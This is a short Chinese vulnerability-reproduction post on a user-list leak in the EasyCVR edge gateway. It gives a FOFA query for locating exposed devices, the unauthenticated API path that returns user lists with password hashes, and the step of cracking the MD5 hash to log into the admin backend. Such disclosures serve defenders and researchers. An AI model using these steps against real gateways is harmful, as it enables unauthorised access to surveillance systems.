【漏洞复现】EasyCVR智能边缘网关用户信息泄漏漏洞

Nx01 产品简介

        EasyCVR智能边缘网关是一种基于边缘计算和人工智能技术的设备,旨在提供高效的视频监控和智能分析解决方案。它结合了视频监控摄像头、计算能力和网络连接,能够在现场进行视频数据处理和分析,减轻对中心服务器的依赖。

Nx02 漏洞描述

        EasyCVR智能边缘网关存在userlist 信息泄漏,攻击者可以直接登录后台,进行非法操作。

Nx03 产品主页

fofa-query: title="EasyCVR"

【漏洞复现】EasyCVR智能边缘网关用户信息泄漏漏洞_第1张图片

Nx04 漏洞复现

POC:

/api/v1/userlist?pageindex=0&pagesize=10

【漏洞复现】EasyCVR智能边缘网关用户信息泄漏漏洞_第2张图片

使用获取到的password进行MD5解密进行登录。

【漏洞复现】EasyCVR智能边缘网关用户信息泄漏漏洞_第3张图片

Nx05 修复建议

建议联系软件厂商进行处理。

你可能感兴趣的:(【漏洞复现】,安全,网络,web安全)